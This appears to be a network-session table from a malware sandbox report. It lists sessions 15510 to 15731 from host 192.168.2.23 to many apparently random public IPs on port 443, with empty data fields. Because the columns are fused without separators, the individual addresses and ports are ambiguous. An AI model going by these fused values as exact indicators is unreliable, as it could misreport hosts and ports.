                                                15510192.168.2.2341138193.91.6.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15511192.168.2.233770619.23.135.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15512192.168.2.2358340131.248.135.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15513192.168.2.2345726160.148.68.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15514192.168.2.235572486.27.236.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15515192.168.2.235591614.35.34.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15516192.168.2.234003870.93.161.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15517192.168.2.2354834128.119.80.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15518192.168.2.2360808135.179.205.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15519192.168.2.2356028186.138.170.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15520192.168.2.2355840196.126.167.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15521192.168.2.2354446130.73.165.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15522192.168.2.2334028180.107.71.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15523192.168.2.235435444.126.249.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15524192.168.2.2342712182.174.250.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15525192.168.2.233930850.221.56.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15526192.168.2.2353992150.61.97.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15527192.168.2.234093254.37.133.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15528192.168.2.2345256149.42.56.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15529192.168.2.235710640.63.207.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15530192.168.2.2345934204.195.122.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15531192.168.2.2354098170.147.3.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15532192.168.2.2339000180.112.127.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15533192.168.2.2352100128.169.133.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15534192.168.2.2356792163.55.115.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15535192.168.2.2333222205.237.80.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15536192.168.2.2343016210.89.124.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15537192.168.2.2356904141.183.152.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15538192.168.2.2360986112.31.83.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15539192.168.2.2347196101.180.248.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15540192.168.2.235297085.222.239.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15541192.168.2.2342588176.175.233.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15542192.168.2.2350886220.176.209.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15543192.168.2.2346744201.189.167.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15544192.168.2.2356150145.217.88.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15545192.168.2.23540221.76.228.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15546192.168.2.235781648.198.219.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15547192.168.2.2338428183.64.168.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15548192.168.2.235901850.79.163.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15549192.168.2.234558077.34.203.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15550192.168.2.2347506179.145.222.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15551192.168.2.234519439.164.100.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15552192.168.2.2358278144.94.215.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15553192.168.2.2336488178.224.218.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15554192.168.2.2337582103.105.125.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15555192.168.2.2359726198.244.179.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15556192.168.2.2334540174.166.49.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15557192.168.2.2352612171.21.249.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15558192.168.2.234415659.227.76.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15559192.168.2.233557452.211.244.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15560192.168.2.2353380108.78.38.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15561192.168.2.2336026183.214.93.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15562192.168.2.2354202120.238.148.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15563192.168.2.2344340117.61.33.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15564192.168.2.234609242.250.62.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15565192.168.2.2337880216.27.86.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15566192.168.2.2356316179.72.48.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15567192.168.2.234052843.29.133.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15568192.168.2.235676867.80.227.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15569192.168.2.2351806155.144.77.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15570192.168.2.233487443.125.191.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15571192.168.2.2333430113.59.86.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15572192.168.2.233477218.226.121.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15573192.168.2.2343804205.172.15.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15574192.168.2.2360758162.63.113.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15575192.168.2.2345128164.237.70.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15576192.168.2.2344682152.174.37.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15577192.168.2.2335498180.71.90.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15578192.168.2.235604624.200.218.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15579192.168.2.2347292190.154.84.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15580192.168.2.2350190108.254.2.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15581192.168.2.2339734170.82.11.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15582192.168.2.2349744167.72.73.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15583192.168.2.2347578213.112.251.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15584192.168.2.2339988140.12.181.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15585192.168.2.2352892184.195.134.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15586192.168.2.2354240200.120.178.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15587192.168.2.2333112123.151.153.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15588192.168.2.2356390172.49.140.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15589192.168.2.2356446221.184.143.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15590192.168.2.2339574132.167.61.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15591192.168.2.2340188144.120.74.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15592192.168.2.234292420.246.190.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15593192.168.2.2356130209.19.128.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15594192.168.2.235704875.164.157.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15595192.168.2.2345014156.167.87.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15596192.168.2.2351392106.194.217.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15597192.168.2.2354472150.105.67.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15598192.168.2.2344244134.152.150.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15599192.168.2.2343466135.123.213.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15600192.168.2.234216032.42.86.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15601192.168.2.2341814221.57.49.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15602192.168.2.2349710105.213.115.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15603192.168.2.2360098191.211.110.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15604192.168.2.234810469.22.135.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15605192.168.2.234692617.155.212.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15606192.168.2.233561819.104.140.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15607192.168.2.2334742192.251.243.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15608192.168.2.2347888160.93.122.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15609192.168.2.2345500131.43.177.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15610192.168.2.2354226187.130.11.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15611192.168.2.234249258.35.178.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15612192.168.2.2341458125.145.200.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15613192.168.2.2339964134.214.18.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15614192.168.2.2340120219.68.20.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15615192.168.2.2335410137.241.87.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15616192.168.2.2359322191.212.186.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15617192.168.2.2339484134.216.19.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15618192.168.2.2342850220.237.60.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15619192.168.2.235444839.91.127.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15620192.168.2.2340710135.254.94.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15621192.168.2.2334850148.103.72.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15622192.168.2.2341444108.216.96.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15623192.168.2.234484414.55.113.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15624192.168.2.234003254.21.128.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15625192.168.2.2347472156.141.174.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15626192.168.2.233430090.61.191.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15627192.168.2.234962257.103.64.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15628192.168.2.235263024.205.212.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15629192.168.2.2340630191.31.107.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15630192.168.2.2341160115.171.184.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15631192.168.2.2335580183.35.150.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15632192.168.2.235750861.190.35.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15633192.168.2.234550486.93.103.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15634192.168.2.233431879.216.172.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15635192.168.2.2332956181.8.180.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15636192.168.2.2357410121.79.35.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15637192.168.2.235649493.230.152.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15638192.168.2.2349556114.117.155.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15639192.168.2.2333338141.170.107.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15640192.168.2.2340602202.27.113.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15641192.168.2.23489408.236.195.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15642192.168.2.233949882.25.105.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15643192.168.2.2336286213.29.143.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15644192.168.2.234239093.62.8.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15645192.168.2.233542259.10.34.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15646192.168.2.233722297.39.132.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15647192.168.2.2351774193.228.26.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15648192.168.2.2340838103.100.192.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15649192.168.2.235027243.48.95.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15650192.168.2.2342306197.151.223.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15651192.168.2.235174669.4.29.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15652192.168.2.2354544156.15.226.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15653192.168.2.234941635.193.174.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15654192.168.2.234196250.71.87.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15655192.168.2.2344718155.232.182.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15656192.168.2.235528268.195.149.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15657192.168.2.2340186104.163.186.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15658192.168.2.233461865.74.66.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15659192.168.2.2359898124.34.118.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15660192.168.2.234768860.167.133.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15661192.168.2.2333348154.77.10.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15662192.168.2.2342234223.179.73.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15663192.168.2.2346990200.34.4.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15664192.168.2.2347738107.138.253.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15665192.168.2.2360298193.236.38.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15666192.168.2.235255031.153.144.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15667192.168.2.234882057.152.53.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15668192.168.2.234165859.69.246.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15669192.168.2.235668486.147.156.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15670192.168.2.2348500173.23.60.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15671192.168.2.235868276.4.122.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15672192.168.2.233382897.137.9.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15673192.168.2.2334994163.89.179.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15674192.168.2.2341972195.193.25.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15675192.168.2.2350194219.65.68.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15676192.168.2.2334998117.133.166.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15677192.168.2.234334898.20.111.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15678192.168.2.2338536136.60.222.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15679192.168.2.233920449.148.79.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15680192.168.2.2345682186.80.81.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15681192.168.2.2343244121.233.82.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15682192.168.2.2355550181.201.219.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15683192.168.2.2348572191.227.105.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15684192.168.2.2345092175.142.242.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15685192.168.2.2334166203.140.96.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15686192.168.2.2352358203.174.109.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15687192.168.2.2359694130.125.72.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15688192.168.2.2340620184.141.39.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15689192.168.2.2359582190.224.139.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15690192.168.2.234884880.53.148.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15691192.168.2.2350678197.76.35.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15692192.168.2.2335714192.215.203.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15693192.168.2.2355650147.172.140.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15694192.168.2.2359754131.252.0.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15695192.168.2.235309688.51.31.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15696192.168.2.2343968143.186.55.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15697192.168.2.2338366158.67.107.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15698192.168.2.2348496134.75.170.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15699192.168.2.2354900213.121.167.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15700192.168.2.2342678137.131.130.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15701192.168.2.2338902164.241.5.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15702192.168.2.2336172208.48.50.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15703192.168.2.233898835.234.27.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15704192.168.2.23545249.107.184.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15705192.168.2.2359076121.170.130.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15706192.168.2.2345982167.101.77.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15707192.168.2.2341772117.159.154.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15708192.168.2.2343336158.237.170.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15709192.168.2.2344554169.38.245.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15710192.168.2.235049667.251.147.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15711192.168.2.2346992108.184.231.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15712192.168.2.2345260197.3.77.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15713192.168.2.2338548184.125.17.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15714192.168.2.235237647.116.70.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15715192.168.2.235503470.27.204.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15716192.168.2.235334273.196.83.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15717192.168.2.2340160158.119.192.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15718192.168.2.234880017.22.200.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15719192.168.2.233931468.149.70.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15720192.168.2.235460291.22.120.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15721192.168.2.2342084138.208.121.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15722192.168.2.234680488.77.231.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15723192.168.2.2346006132.16.136.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15724192.168.2.235046031.249.83.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15725192.168.2.235175479.30.128.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15726192.168.2.2344412153.25.74.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15727192.168.2.2355802122.208.18.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15728192.168.2.2333994186.232.36.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15729192.168.2.235442647.81.23.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15730192.168.2.2343946184.41.82.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15731192.168.2.2341744110.216.86.26443
                                                TimestampBytes transferredDirectionData


